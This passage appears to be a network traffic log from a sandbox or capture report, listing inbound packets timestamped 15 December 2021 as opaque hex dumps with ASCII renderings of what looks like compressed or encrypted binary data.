6c 79 cc 12 6c a3 be fe e9 88 34 9e 7d 06 50 46 08 97 b0 d6 40 46 37 f6 e8 86 9b ed 1e 06 Data Ascii: $'dq.Gw}A&QUBB`t7>hB?i7{VH5Z/SI~$7!;){Z}p8,(8BSkE#}>HFjqLg!x7F8D)P"^{FC&nJba5u-;(j"Jlyl4}PF@F7
2021-12-15 13:13:48 UTC	29	IN	Data Raw: 3a bb 58 c4 43 65 6b aa b6 2e 2c 27 11 55 a1 61 5d 5b c0 f3 f3 fe 92 fa 2e 51 17 b3 31 28 5a 96 bf 23 ec ef 59 4c 6a 5b e9 eb 2e 18 29 36 9f 8c 26 1f 9c ce 16 4b fc 25 5b 97 f2 40 31 65 66 0e 87 bf cd 0c 38 75 90 68 bc 04 29 cb 0f d0 94 01 68 de c4 c6 4f cc 0a 0e b2 8e 76 de a2 08 b6 1b 6d 02 fb d4 29 d4 32 27 37 7c d8 59 5d 40 ce 35 19 c6 18 44 fc 66 67 b0 d3 17 63 8d c3 d7 34 ee f8 84 c8 ec 51 cc d9 8b da 36 58 01 aa d4 3e e5 9b ed d8 b3 d8 21 ef 34 98 31 dc b9 48 10 69 a8 19 28 82 59 94 5f 18 74 9f d9 03 d1 91 78 22 e9 45 b4 e6 cd 60 2b c7 ec 3c 33 02 32 36 e6 fc fc e1 62 13 5e 25 17 d4 7e b3 43 03 4f 7c da 3b d5 d8 05 da 21 d1 45 fa 19 b3 12 b2 fa 35 0b 4c 5a a1 03 33 ee 91 08 c8 e2 8d f0 44 69 c2 20 d9 df 4c 49 19 a6 0e c1 af c3 46 1f b8 4e a0 28 11 Data Ascii: :XCek.,'Ua][.Q1(Z#YLj[.)6&K%[@1ef8uh)hOvm)2'7\|Y]@5Dfgc4Q6X>!41Hi(Y_tx"E`+<326b^%~CO\|;!E5LZ3Di LIFN(
2021-12-15 13:13:48 UTC	31	IN	Data Raw: ca 7f 2e cf 34 e3 9c 41 7a e8 df 5f 9a ec eb 48 a3 c0 72 1d c1 1b d5 c4 98 ff be 09 34 c6 d6 ac 55 3d fa f7 be 8a 70 3c 44 a9 5b cd a0 2f e6 3e 73 e0 d8 c3 36 3d fb 80 4d ac 6a 26 90 c4 a1 0f a1 f4 1a ab 50 4d 03 c9 4f 36 53 bc 2f 4d d9 5b 8c 82 10 0b 04 d0 39 dc cb 34 eb 6d 15 c6 eb 10 5e fc b8 46 87 80 ac be 70 10 07 19 a6 ba 80 55 5a 43 a3 17 7b 1e fa 11 f3 4e b0 78 d5 34 9f 92 00 a9 ad 1e 46 43 1b ae 6b dd 5f 2a bc ca 54 6e 06 dd b5 03 87 82 4a 98 f9 2a 5f 45 0d b6 11 33 27 4b 0b 12 44 17 8a 5b 3c a6 f0 0f b5 a2 61 62 99 ff 91 14 af 4d fb 5d 3c 1e 9d 0b 70 d8 1d ef 41 c7 6f 24 e6 e8 1f 63 b6 bf 66 84 ca 29 b2 d3 d1 19 8a 53 87 0e ca 18 c7 3f 6e 96 1c a8 75 81 87 4a d0 62 ae 08 aa f1 39 02 42 21 d8 21 8f 25 a3 0c 22 cb 9f 7e 6b d0 63 5c 0d 9c 0f 5d 00 Data Ascii: .4Az_Hr4U=p<D[/>s6=Mj&PMO6S/M[94m^FpUZC{Nx4FCk_TnJ_E3'KD[<abM]<pAo$cf)S?nuJb9B!!%"~kc\]
2021-12-15 13:13:48 UTC	32	IN	Data Raw: a4 a5 0a e3 24 e7 b1 06 41 90 47 40 a7 0c a7 2f fe 77 e3 ee a2 88 18 6e 56 7d cb 20 bd 2b e1 66 47 af b1 08 b3 97 7f 55 ba 14 23 4a b0 67 fa 10 51 d3 6a 59 d3 15 0a ea 0b 2a cf 75 0f fa 93 fc 63 4f 6d 06 3c df 53 17 44 80 1b 5d eb f0 77 ff e4 c3 ec 2a d0 25 b0 be 4a 55 85 9c 97 cb ee c0 ca 17 52 b9 86 c6 64 4f 2c b8 32 d2 57 30 1c 51 35 19 3b 80 1c a9 ff 38 12 6a 4d 43 4a 6d 4c 05 a5 81 4b 85 40 cd cb 0f ac 3b 1e 09 c0 0f 2e 6d e3 e3 fd c2 d7 67 9a 48 fe c6 6e d9 08 b5 ec ab 70 e0 cf f5 72 f1 01 52 ef d9 73 0a 6f b2 96 ff fb 76 e4 be 72 d7 cd 6d 15 00 13 73 1a 28 06 48 08 a8 00 37 14 4b 90 06 6a da 29 b2 c5 6f 2f 8e fa c3 21 fe dc 12 f7 82 72 20 36 56 08 57 31 99 e5 da ac c4 14 2a 03 24 24 27 9c fd dd 61 7c 15 ed 98 4f b5 dd 5e 94 cc 04 23 ad 25 c7 90 48 Data Ascii: $AG@/wnV} +fGU#JgQjYucOm<SD]w%JURdO,2W0Q5;8jMCJmLK@;.mgHnprRsovrms(H7Kj)o/!r 6VW1*$$'a\|O^#%H
2021-12-15 13:13:48 UTC	33	IN	Data Raw: 90 00 eb 63 43 16 73 39 72 0b 4e a5 1e b3 d4 1f bf 57 bd 75 1e c0 9c db fe c6 06 7e 89 d1 1b 00 87 62 b9 26 1b ce 25 2c e4 13 c9 85 4d 7f d5 90 d4 d2 0d ae 72 07 2a a3 db 92 8e 9d c3 de 36 9c 07 2b 1f 77 4a 1e 77 ba 63 1d 64 ed c2 c8 20 6d 88 0d 47 4b 15 8a fe a5 9f 17 5f 98 36 9d aa 7e fd 62 4f 05 d9 dc 9e a4 18 8b 92 30 73 20 89 17 82 2b fc 96 2b 9c b9 54 37 31 97 ce 42 c7 10 dd 2a 1f f7 6f 4d 3c e8 8b a3 81 d6 35 65 e7 8c 12 66 9b 9d 54 de 7e a3 75 0c ae d4 3f 68 36 5a b9 e4 30 de 0b 21 11 b4 9d 59 b9 8a ed df 6a 6d 8e d2 11 b3 b8 2f ce b3 51 ee 8e 99 24 24 16 64 72 54 23 33 90 2b b9 92 1d b9 54 8e 3b 39 39 1a 9e 7b 29 82 c7 f2 88 ab ce 56 ba 9f 50 e2 d4 0a de e3 94 a1 89 19 f5 12 65 bf dd 3e 26 22 f6 03 70 02 f4 08 c8 6b 20 14 72 08 f3 a2 1d 48 b3 a2 Data Ascii: cCs9rNWu~b&%,Mr6+wJwcd mGK_6~bO0s ++T71BoM<5efT~u?h6Z0!Yjm/Q$$drT#3+T;99{)VPe>&"pk rH
2021-12-15 13:13:48 UTC	34	IN	Data Raw: 7a 2d d7 9d 25 6b 4e 5b 71 bb ed f4 7d 82 fa a3 4a 23 83 49 0a ec 4c 3c fc 45 a2 f7 34 7e e6 6a fd 07 8f 11 a7 5d 74 08 aa 70 3d 80 ee 24 e4 1c 35 d5 79 e3 00 bf 6a 48 e6 74 30 36 ad 17 06 7c 1d 7e 09 6d 23 26 f4 f2 f9 52 2b 18 24 34 d6 32 8b c2 e9 f6 22 c8 85 24 1b e4 2d 21 8b 7e 7e 58 6d 14 8d de 3f 56 c2 93 f1 42 19 43 5d 87 48 62 74 be 19 1e 28 0e dc 7b 52 42 31 3b b0 88 b7 8d 2b 39 50 30 dd 4f c9 69 1d 3e be ea 77 36 1e cd ba 19 95 9d 5a 87 bc d5 a2 9f eb 14 fc 3b 9f 02 fb d4 c6 0a a1 ae 65 48 b1 04 f1 c9 10 fc 80 9b af a6 a3 f3 07 4d 7a bf b8 0b e9 d0 36 65 8d dc c8 2c 67 60 ab 21 2f 57 c6 66 27 51 c6 95 21 1e 60 2d 1f 5c cf 66 70 80 2a 98 cd 53 a2 30 64 e8 f6 46 92 64 40 82 60 26 df 72 4d dd a6 2a a1 f6 35 ba 42 43 9c 4d f0 f3 51 74 d0 27 39 82 c9 Data Ascii: z-%kN[q}J#IL<E4~j]tp=$5yjHt06\|~m#&R+$42"$-!~~Xm?VBC]Hbt({RB1;+9P0Oi>w6Z;eHMz6e,g`!/Wf'Q!`-\fpS0dFd@`&rM5BCMQt'9
2021-12-15 13:13:48 UTC	35	IN	Data Raw: 6b 84 89 fe 77 88 77 74 13 5a 06 1e c5 ab 37 90 a2 76 01 fa ee e0 fc da 2d c8 23 a9 d4 22 cc 45 53 1b 6e 6e c1 1d e4 e1 b6 f6 1a 54 b0 9f f6 90 5f c1 09 94 3b 93 17 71 db 7b 6e 52 99 e2 9a f2 23 61 c1 f4 ae 33 93 e8 bd e1 42 63 be d0 48 28 15 ca 3e 30 75 2c 1f 2b bc 84 b1 00 52 00 2b aa 77 b8 23 db 70 32 66 a9 5b 10 9f b7 5c b2 9a d4 d8 4a f8 88 78 8b d0 36 3a 4e 1a 01 b1 0a f0 18 78 9d 38 6f 82 0d 63 34 f3 1d 04 1b 01 b6 0d e5 49 f5 87 10 68 da aa 07 ca b8 14 c6 60 d8 23 8e 0e 91 2f 82 af de 26 12 06 19 da 96 a3 0e d8 7c cb 1b fe 86 fa 9c 7e 53 05 d8 2b 67 4d da 9f d4 15 19 32 ee c0 6c ba 56 ca 74 05 9e 58 54 31 63 85 63 d5 6a 4c 34 36 87 59 08 ca 8b 6d 08 63 2a 61 5d cc 52 e7 5f 8d bf 86 b5 0c c3 6f b1 11 ba 31 10 7f 4d 3d 6a b7 d9 53 60 02 57 98 17 ef Data Ascii: kwwtZ7v-#"ESnnT_;q{nR#a3BcH(>0u,+R+w#p2f[\Jx6:Nx8oc4Ih`#/&\|~S+gM2lVtXT1ccjL46Ymc*a]R_o1M=jS`W
2021-12-15 13:13:48 UTC	37	IN	Data Raw: cc 2b 22 4f 1e 24 a5 9d 9a 83 73 6e 3a bd a7 87 97 db 14 df a0 af 50 fa fd 16 5f 7d 3e 1c ca 4b 22 a1 95 20 52 1c 4b d7 e2 65 93 df 9d 49 ee e5 48 b3 86 6e 5f 0e f9 5f 10 2b de 29 51 aa 24 bc 36 ca bb 31 ef 78 11 19 0b 58 f7 2c 9b 9f 04 a6 52 6d a5 6e 93 ae 71 7f 89 72 27 69 5e ed 65 d4 4c 2f af 38 82 41 2a 08 c4 32 6a 41 d5 83 c6 30 e7 ed 23 cc ae 47 24 ea 60 fc 43 e7 c3 41 b3 1a 66 13 1d c1 b1 bf 84 62 01 eb 4e 8e ed bc e2 08 6f 6b 39 52 66 a4 7f 70 64 93 3c 5c d9 e2 ef 1f 98 ba 0f 81 97 dc 54 46 ff 40 ec 78 67 1a e5 3c 4a c5 25 15 38 c0 ee d4 63 96 c8 85 46 24 57 79 c0 eb 5a ff 5b 81 e4 ff ab 3d 79 45 90 c7 4c 00 fa a0 21 e7 29 da a3 db f0 af f4 3c 6d bc d5 fb 8b eb 20 f0 e0 cc 90 13 8b a5 12 e4 bd 46 41 9a c7 56 11 8e be 0c a5 5d 39 99 b9 04 35 65 f3 Data Ascii: +"O$sn:P_}>K" RKeIHn__+)Q$61xX,Rmnqr'i^eL/8A*2jA0#G$`CAfbNok9Rfpd<\TF@xg<J%8cF$WyZ[=yEL!)<m FAV]95e
2021-12-15 13:13:48 UTC	38	IN	Data Raw: 94 7b 3c c6 9c 82 20 a6 9d 35 f0 3f d3 17 b6 01 bb 01 22 b8 60 2d d4 4c 36 1f a2 79 19 f4 fb 1b ba 70 99 fc 10 f2 c8 a5 f6 fd 0b c7 e1 fa e3 36 b6 50 99 b5 c8 dd e3 aa df e7 b3 e5 4a 67 0a e8 2a a0 bb 95 34 dd f3 71 fa fd cc 85 bf 2e be dc b6 4c 4a 3d 63 73 2f 68 8c d2 0c de 26 02 f3 89 fe d2 9d 7a 32 94 4b 41 55 55 fd 86 d0 66 49 8c 60 fe d0 d5 5e b0 ab 03 fe 99 93 04 db ac b9 19 1e f4 0d d2 fe ad 36 00 8d 75 5e 8a 34 be 83 57 66 4b 3e a1 de a9 0c ab f5 11 63 15 1e 3b 81 84 c8 d9 41 f3 08 17 38 74 cf f3 d5 35 55 13 87 80 88 9a 2d ae dc 0e 5a ac 0a c5 69 c6 be a0 22 23 1b f7 98 d3 17 08 0f 89 55 8a bd 8a 8c 45 a1 e8 8f 02 36 c0 59 30 00 2d 10 3a eb 60 39 8f e5 30 5d bb 7c 70 8f 0d 98 cd 55 a6 54 a1 a3 3c 81 18 d9 b8 97 b1 cc 55 b9 5d a1 76 05 16 e7 c3 6d Data Ascii: {< 5?"`-L6yp6PJg*4q.LJ=cs/h&z2KAUUfI`^6u^4WfK>c;A8t5U-Zi"#UE6Y0-:`90]\|pUT<U]vm
2021-12-15 13:13:48 UTC	39	IN	Data Raw: 63 cb 2f 2a f0 a8 38 47 89 c2 ad 67 ee 8c 7b 78 ff 77 0b 30 01 8b b2 9b bc fb aa b4 54 39 65 19 f7 6b 2f 75 ca a6 c5 a0 83 86 48 4f 62 c7 fa 5e 20 a0 4b d7 a3 be fe 93 84 69 76 13 20 5e c2 8a 50 a0 53 03 f7 4e 51 e8 86 9b 69 dd da f3 09 c8 76 3f 7a f4 be de 6c 22 61 be 53 35 20 b5 dd 8b 3d bc 2d 12 3b ae 01 71 65 a6 d4 aa 6d 77 31 69 f3 c9 54 7a c3 07 2a 92 e1 5c d9 02 d5 d8 40 79 78 a3 e5 2e 12 3b 4e 1a 01 b1 8a 30 69 1a 16 07 65 d2 67 6a d7 ea 8b 84 4e ba 58 ba 6e 1c 8a c0 d8 3a 62 fe c9 82 6e 97 02 fb 18 1b 70 01 32 3f fb ac 5c e3 82 a5 8c 30 04 53 a7 ec 43 cb 97 be 16 aa 74 98 9e 4c 87 a9 a3 de 9f 5d 28 77 6a 86 92 7f 8b 65 58 b2 9b 71 34 d7 b8 31 31 d2 31 7e 82 9f e7 43 3e fd 3e 39 4b a8 fc 28 fd 94 50 45 17 07 8d 95 98 84 be e0 7b a4 d5 9c ff c1 2a Data Ascii: c/8Gg{xw0T9ek/uHOb^ Kiv ^PSNQiv?zl"aS5 =-;qemw1iTz\@yx.;N0iegjNXn:bnp2?\0SCtL](wjeXq4111~C>>9K(PE{*
2021-12-15 13:13:48 UTC	40	IN	Data Raw: b8 41 1e b4 54 27 24 24 54 1e d8 2a e4 ef 68 ea 5d 83 b3 ad 48 f7 54 af e7 0a b7 14 96 af 88 31 32 b6 27 a1 88 49 75 b8 7b be dd ed 88 2e fc 07 b4 7d 66 60 2d b7 ee f4 c9 3f 49 d6 15 9c fa f4 45 2c c3 c8 f4 c0 9a be 74 77 08 13 89 a7 5a a2 fe 3a 31 9c 5d 62 d0 82 9e 5b f4 f0 33 2a 7e 9d b9 ed ab 53 fe e7 7f 45 58 e3 b8 d4 06 68 26 db 3d 2c f5 d6 7b 20 32 69 4d d7 86 46 04 2f b2 fb 14 e6 a5 d7 f4 3e a7 95 61 d4 f3 cd 60 b6 82 f0 73 18 e2 00 96 d4 5c 9c 9a 13 83 6b 66 38 fd 56 e7 ec 19 1a b9 b9 96 0f fc c0 9c e3 c7 d9 4a 37 dd 24 19 29 c3 81 14 59 ba 67 19 ef a0 24 9b 92 f8 4e 00 e0 59 ba 1d 86 8d c7 ea 6c be aa 98 5d 21 4d 5d af 7c 19 3d f2 50 8c bb 0c f9 79 e7 e9 e8 52 91 a2 2a fb dd ce 4e 96 5a 50 c3 1b bd f6 88 94 d8 f5 4a bf a1 21 91 e9 7a d4 ec be c1 Data Ascii: AT'$$Th]HT12'Iu{.}f`-?IE,twZ:1]b[3~SEXh&=,{ 2iMF/>a`s\kf8VJ7$)Yg$NYl]!M]\|=PyR*NZPJ!z
2021-12-15 13:13:48 UTC	42	IN	Data Raw: 94 61 b3 e4 fa 2b 8e 6b 51 b2 da 94 58 12 34 f3 a3 39 f2 5f 9e 67 85 fe 38 4d 4a 69 37 f2 a2 1e 8b 27 35 a7 61 aa 96 5a c5 7f bd 43 2f 2b 04 5f c4 9d 22 f4 23 07 05 81 17 d2 f9 f7 c5 96 aa 55 e7 0f 2b 65 de 6d d3 a2 1a b5 ec 09 fc 66 5c a5 34 5c c0 99 7d 7f 06 c2 1e 47 ef 77 55 b9 95 be be 9c 0c a3 1c aa 59 9e a2 19 45 7b c9 7d 2a 9e cf 97 12 b0 30 d5 82 2b 8a 5e ea 1b 22 ab 94 8d f3 82 3e 48 e2 4b c4 6f 8c d9 e9 0a e7 e1 88 08 12 79 df f6 06 b9 51 50 04 bf f8 fc e2 33 b3 ff 12 ff 2b be fb d6 c1 68 42 02 ea 7e 45 bc 85 8c 3c d5 a2 6f 6d 5b 6e 07 8b fd 04 15 6f 8b 17 3a 58 10 ed 1f 7e 42 64 08 dd 6f 2b 6f 8d f8 f6 6e dc 61 de 33 40 14 31 66 d8 78 cc e4 61 16 93 fd bf 6f c0 03 1a 49 82 96 21 1e 03 a0 cc d0 5b 23 44 0e 03 16 0c 19 64 a9 a4 dc 09 1c e7 50 c5 Data Ascii: a+kQX49_g8MJi7'5aZC/+_"#U+emf\4\}GwUYE{}*0+^">HKoyQP3+hB~E<om[no:X~Bdo+ona3@1fxaoI![#DdP
2021-12-15 13:13:48 UTC	43	IN	Data Raw: e2 46 aa 12 8d cb d0 6c 41 03 89 06 6b 26 c3 fb 3b 98 a2 d9 ae be 5d 9f 68 ea 88 1e 7a 3f a6 ac 33 74 f6 c2 1f cf 71 46 b6 7c 29 e1 d9 f8 65 ad 79 9c 61 cb f7 54 2b dd 07 48 db d0 fc f3 4c e3 90 5c fe 3d 17 cc fe 1b 75 f9 a0 3d 49 d4 f0 96 04 7d c7 05 17 79 db a2 da b2 64 e6 d1 e3 9c ef d2 a8 76 1f 5d e4 aa 2f 0e d7 a5 75 81 5b 7a a8 89 00 41 7b f1 2a 63 13 6d e8 6b 45 d9 24 d8 7e 32 e9 9c c5 d5 48 4b 29 fa 95 98 83 7a f5 d7 f2 f7 cb 7a 0e d9 85 66 8a d8 e3 82 62 10 0d c0 33 d1 82 71 64 c0 e7 ad 48 4d 2e 5c 36 c3 55 5a 75 07 10 b7 5b 22 f1 2c 18 ef fa b9 46 40 ea c6 0d 2a 6d c1 19 a6 ad 87 55 1b 03 0c 91 46 e1 05 63 3e fb 0d c7 ed e2 8e e5 62 a2 10 e1 b8 a9 ff 16 2e 22 48 9b 8d cf 51 38 92 b0 9a ce 79 7d c6 c0 c0 72 15 45 b5 b4 11 33 7c af 21 5f 82 92 57 Data Ascii: FlAk&;]hz?3tqF\|)eyaT+HL\=u=I}ydv]/u[zA{cmkE$~2HK)zzfb3qdHM.\6UZu[",F@mUFc>b."HQ8y}rE3\|!_W
2021-12-15 13:13:48 UTC	44	IN	Data Raw: ec 42 81 60 26 56 a0 26 29 80 ee 9c 6b bb ba e0 c8 6f 19 b3 6f 12 0a ac dd 7e b5 4b 8a 48 71 7b 5b 74 ff 1c 93 68 62 ec 88 4b 0e 65 f6 8f 6d 78 f7 03 6c 95 91 0b db dd 1a 49 11 61 9a 2b c1 77 76 a8 e2 10 08 cc 81 e0 5b e2 34 f4 4e 69 66 c3 ec a2 90 17 e0 d0 25 e0 a5 84 f8 07 e8 2d 11 d6 1f 20 25 5d b0 83 5d 2c 6d 9e a4 01 fd 32 d6 fe 87 0d d5 2e 62 20 78 bc d6 f5 70 97 da 3d c4 7a f2 27 30 3a 59 2d 54 37 51 bc a1 b1 f8 95 76 e3 e7 e8 61 a2 94 21 71 de f6 69 a3 8b 64 ca 4e 6a e9 eb 82 5e 2e a8 1b 0e 23 45 f6 ad 41 74 e1 19 0d b7 9e 92 0c 51 ca a7 e3 2f 98 6c 68 86 f9 80 e2 8d 81 78 dd 7a 12 1c 83 3d b9 0a 9d 45 f5 17 42 4f a0 e3 7a 72 fc 94 a2 22 6b f5 9e fc 80 85 11 6a de 31 a5 8b 19 44 82 06 78 12 04 69 93 66 28 aa 3e 6c 40 2f 19 de 44 8b 52 0e 47 38 6b Data Ascii: B`&V&)koo~KHq{[thbKemxlIa+wv[4Nif%- %]],m2.b xp=z'0:Y-T7Qva!qidNj^.#EAtQ/lhxz=EBOzr"kj1Dxif(>l@/DRG8k
2021-12-15 13:13:48 UTC	45	IN	Data Raw: 52 0b 80 98 b3 33 f2 e5 4a a9 99 84 a1 4a 7c 67 7a 9a 26 61 a3 8d 7c ce d4 74 1b b1 38 90 1c e4 d5 59 62 3b b1 ce 7d b6 12 e0 5e 0c 27 f1 58 89 a0 5f 60 7c 5a 73 4e 1c 9b 3f 2d 89 18 38 14 26 85 3f 98 00 f5 38 b3 ca 82 89 b8 52 99 c9 e4 ab 64 6b d0 e0 98 fd 22 8e 55 00 eb 00 5a 8c b6 19 74 34 38 a2 c4 de 4b df 41 a8 60 08 f3 90 63 24 27 dd 9d 25 a5 51 53 85 73 10 82 d5 1b c7 25 18 58 46 ac 42 7e 37 da a5 00 57 cc 7e 07 5f 57 e9 f5 09 93 12 ce 87 33 23 33 92 a6 70 c9 da 2a df 32 30 37 bb a3 97 cf 7a fb e0 3b 5f bd 10 f6 7e 48 f0 59 64 78 7d 7a 3f f4 9d df 0a 0c aa 52 a9 c3 86 b0 f2 be 75 81 3f c4 ff d7 c1 25 8f 91 92 89 7c 21 6e 7e 6f ca 48 7b 7d f2 07 ce e8 e0 0e 34 8e 53 b4 65 8d 8c 76 73 f5 9b 56 de 7e 36 bd 85 4c 2f c1 97 8e 87 01 70 d0 a6 30 ca 70 71 Data Ascii: R3JJ\|gz&a\|t8Yb;}^'X_`\|ZsN?-8&?8Rdk"UZt48KA`c$'%QSs%XFB~7W~_W3#3p*207z;_~HYdx}z?Ru?%\|!n~oH{}4SevsV~6L/p0pq
2021-12-15 13:13:48 UTC	47	IN	Data Raw: fe 15 07 58 d3 3c e5 a9 9b 68 f2 d4 ef 22 cd 6c 46 07 48 48 d8 44 59 00 43 e0 34 46 21 19 27 06 ad 1b b2 17 9a ff 31 39 f4 49 a2 93 01 a9 e1 52 07 e5 13 67 d6 c8 6f d6 08 79 8c ee e0 f6 0e ae cb 37 a4 50 04 46 08 9b c3 c4 23 d0 91 22 5b ef f0 02 28 6b f4 7c 55 d2 87 bd 2a c8 14 c3 f8 9b 3d ad 32 bb 74 ea e1 64 26 79 65 a1 de 83 2f 73 e3 3e ff fa 95 36 6d 25 66 95 1b bd ea d4 5b 7e 91 41 b2 45 da df c5 b0 ff 8c 15 89 9a ec 6e 1e ee b1 f2 e7 82 dc 5c 85 71 42 25 53 88 c8 3b bf 84 99 c5 a1 84 a5 e4 f6 af dd 08 7c 5d da b5 b6 e1 ec 7e db fa c9 e5 61 cd 8f 9d 66 09 14 ff 08 aa 9d fe 60 e0 13 8c 3e bd f1 9b f4 bd a0 38 ab 6d 0f 76 32 20 57 bc 19 2d 27 e2 f5 18 fc bb 4d 87 a1 32 36 91 d0 4d db d3 01 a3 38 93 6a bb 3e 21 4a 40 29 fa d8 70 26 61 05 6e d1 43 0d f1 Data Ascii: X<h"lFHHDYC4F!'19IRgoy7PF#"[(k\|U*=2td&ye/s>6m%f[~AEn\qB%S;\|]~af`>8mv2 W-'M26M8j>!J@)p&anC
2021-12-15 13:13:48 UTC	48	IN	Data Raw: f8 4d e7 66 a7 90 35 4a e0 a5 cf d9 4e 52 35 33 62 26 ab ea 35 75 bb b0 42 1a 49 bf 4c 67 c1 7d 91 27 87 32 53 65 ff f5 bc da 6b 01 ae 45 49 5e 20 bc e7 ca 13 65 24 58 53 2d 36 b4 c4 f0 60 cb 6a 12 75 34 48 0a b3 dd 5e 97 24 54 1c ac 1f e2 65 4b cc 81 ef 43 1d cb f4 4e 4d ff de 07 46 cd d4 05 cc bb d9 f0 0f 4a d9 c7 60 c9 b1 c1 45 63 6e 32 8d 80 da 08 1d a0 3f 9f 32 a3 26 71 8f 38 5b ef e2 5e 03 d4 fd 90 a5 9e cd 47 81 d9 0e 25 3a dc 4f 21 74 0a 37 e7 fd 72 f2 fe 8f d7 f4 88 7d 21 5d c8 41 0e 61 21 df e6 04 b0 3b f1 9e f5 da fd a8 bc f6 25 c7 39 04 a6 18 13 93 05 bf 17 66 82 3e 78 da f3 27 ed 21 62 2d 2c 5a 61 48 c7 1c 8f f1 4f 14 de a6 f7 8b ad 41 f5 f0 92 f3 6f 4f 0c c8 2f 68 b6 8a 90 ba 58 41 6d 41 47 e1 28 f9 ea 85 a4 38 44 73 34 68 47 a4 bd 51 bc 26 Data Ascii: Mf5JNR53b&5uBILg}'2SekEI^ e$XS-6`ju4H^$TeKCNMFJ`Ecn2?2&q8[^G%:O!t7r}!]Aa!;%9f>x'!b-,ZaHOAoO/hXAmAG(8Ds4hGQ&
2021-12-15 13:13:48 UTC	49	IN	Data Raw: c5 f5 87 3c ab 1b b8 24 36 5e d3 ae c6 d3 0b 53 08 2f d8 7b 99 52 13 c3 4c f8 c1 99 4e a9 6c 90 4e c2 d0 a5 75 03 70 b5 43 c7 6f f7 ca cc d2 2f 4a b9 be 48 b5 12 75 0e 0d b7 9c a2 aa 5f a0 eb c3 d3 b7 4d 74 23 b1 4d 04 97 44 e9 88 f7 23 7a 76 1d 4c a4 b8 61 06 02 ff eb 7b 04 88 30 82 3a 99 a3 1a c9 a3 7c 89 6e 94 46 6a 48 22 34 80 79 79 0c a7 32 bb 7a ab cf 1f 14 6d 35 cc 50 41 8d a6 ea 18 c2 83 43 ed 46 e9 ea 04 d2 ef b0 31 24 88 86 7a a0 0d 9b 5f f4 93 f9 d5 22 26 46 22 03 ed 82 04 28 88 ed 4a 4d 27 98 8c 93 0f 90 31 65 6e 8f 93 bf d0 f8 38 14 1d d6 cb 28 28 cb 84 18 19 33 c3 c9 be 2d 9d 9f d1 ca 13 0f a9 7b 15 17 f3 bf fe 7d f7 57 64 95 a1 55 1e ca 96 03 79 41 1b 09 13 e6 bc 26 00 e3 8c db 08 e2 8b cb d3 80 dc bd 4e 73 ba 22 59 95 0b 80 25 ef d5 5d 6d Data Ascii: <$6^S/{RLNlNupCo/JHu_Mt#MD#zvLa{0:\|nFjH"4yy2zm5PACF1$z_"&F"(JM'1en8((3-{}WdUyA&Ns"Y%]m
2021-12-15 13:13:48 UTC	50	IN	Data Raw: c0 ed e8 72 93 51 fa b8 1d 7a 29 8b 7e 51 f6 10 7d 81 44 42 31 ea 0d cf 4a 10 d0 be 1f 46 54 69 c5 82 1a 5a 9b 71 48 90 26 be 29 b8 39 ec 81 29 01 28 87 2d cf 4f 9b bc 41 f2 4d d2 ae ba 47 ef 5f 37 5b 0f 73 20 5a 40 55 f2 fc 29 34 db 46 f9 ad 75 5f 5b 33 2a 04 15 82 53 c6 6f 8b 5c 34 f3 90 b6 34 b6 08 0c 01 74 a1 a3 62 b0 a8 28 b7 fa 9f 94 d7 fc c2 f0 56 09 ba de f2 b6 e6 77 08 c0 73 76 f2 ad c4 21 9f 79 bc 51 99 c9 5e 8f 8e 30 3d 9c a3 d6 83 0d 3a 51 66 bd 3d a6 77 4b 91 7d be 8f bd a5 40 d1 79 d2 5c 1f b9 c2 33 24 de 90 4a 23 11 a2 21 ff e8 e1 1a 2a 59 8b 25 e8 4c ba 53 0b 1f 7e 12 96 68 25 77 91 6b 2a e7 e6 84 9c bc 66 6c 70 0c 74 d2 19 d9 32 49 bf 7b 21 42 57 ec a0 cf 63 81 6a 04 6b cb ce da 28 05 d7 9b 82 d0 7d 9c 6a de 6a a3 75 5e b1 78 10 d3 6a 77 Data Ascii: rQz)~Q}DB1JFTiZqH&)9)(-OAMG_7[s Z@U)4Fu_[3So\44tb(Vwsv!yQ^0=:Qf=wK}@y\3$J#!Y%LS~h%wk*flpt2I{!BWcjk(}jju^xjw
2021-12-15 13:13:48 UTC	51	IN	Data Raw: a0 2d c1 b2 14 b4 63 10 1e dd 31 49 06 d8 55 84 76 8a 52 7e e2 7a da a1 6c b6 80 96 62 5e 55 cc 2c bf e1 ab 3d f3 e8 7e b2 fe 07 fa a0 05 61 17 5e 52 bd 70 93 ca f4 17 7b 01 37 49 13 b0 b9 95 8e 90 d2 41 5b de ed 7d 14 5c f9 e3 12 c1 c1 40 0d d0 d2 c5 d9 0c c6 35 08 20 ae e8 7c dd 52 4b e3 9e 4a 4a b8 e7 bd 38 04 88 77 f5 82 5e a6 f2 65 05 27 b3 95 dd 1b 26 07 9b f4 f8 5c 8a 44 f7 ab 86 72 af f5 62 90 3b f5 8c 14 ea 63 cb 37 da 09 cd 65 82 f9 37 3c 08 94 b0 86 80 10 5f 10 e8 86 10 e5 17 bf 57 32 a9 1c 61 10 92 65 a3 ab 61 9e 41 82 9b 29 b6 65 97 f3 15 e0 91 ff 3d 40 95 ef e3 27 0b e6 70 ea 70 33 10 ee 72 a9 d8 84 fd e8 ea e5 7a 8e 53 26 e0 b3 78 02 59 62 d2 3d 49 c5 a1 8c 34 14 fe e0 44 4d f4 7b e8 e8 a6 89 f7 1a 50 b7 5f 39 4a e1 4e 2d 95 75 7b 2b 93 eb Data Ascii: -c1IUvR~zlb^U,=~a^Rp{7IA[}\@5 \|RKJJ8w^e'&\Drb;c7e7<_W2aeaA)e=@'pp3rzS&xYb=I4DM{P_9JN-u{+
2021-12-15 13:13:48 UTC	53	IN	Data Raw: a2 50 59 d3 06 be fd a3 cd dd f0 61 59 fb e1 20 d0 e8 f1 cd 93 81 c6 a8 60 4a 8b f0 07 4d 7c 65 06 c9 7d 29 cb 34 eb 05 c0 a1 61 62 ab 36 45 82 30 00 25 a1 36 eb 1a ed 0b 9b 08 5d a5 34 97 36 b8 99 cd d0 0c 2e 6c bd 82 a5 e0 26 ea 29 77 b3 b7 46 99 a5 f2 35 41 8d b7 cd 8b 37 6c d4 86 8d 51 60 bb 90 d3 b9 39 99 d7 2a a8 54 d4 a2 23 bc 93 1f ed 77 9e 44 27 9f 57 6b 94 5d 77 e6 cc fa 2c 57 dd 6e 26 23 2c 78 33 02 08 f7 37 88 6f 4f cc 81 e5 40 e2 34 1d 8a e0 34 85 70 5c 6f 45 6d 2d 2c b0 f3 6c 52 a3 d4 87 19 fe a8 d8 f5 52 40 58 0b a7 18 1b aa 7f 61 cd 5c fe ec 6e 59 2e 17 68 eb bb d6 0e 24 27 db 3d 49 ef db 86 df 46 75 19 bc 55 87 37 e7 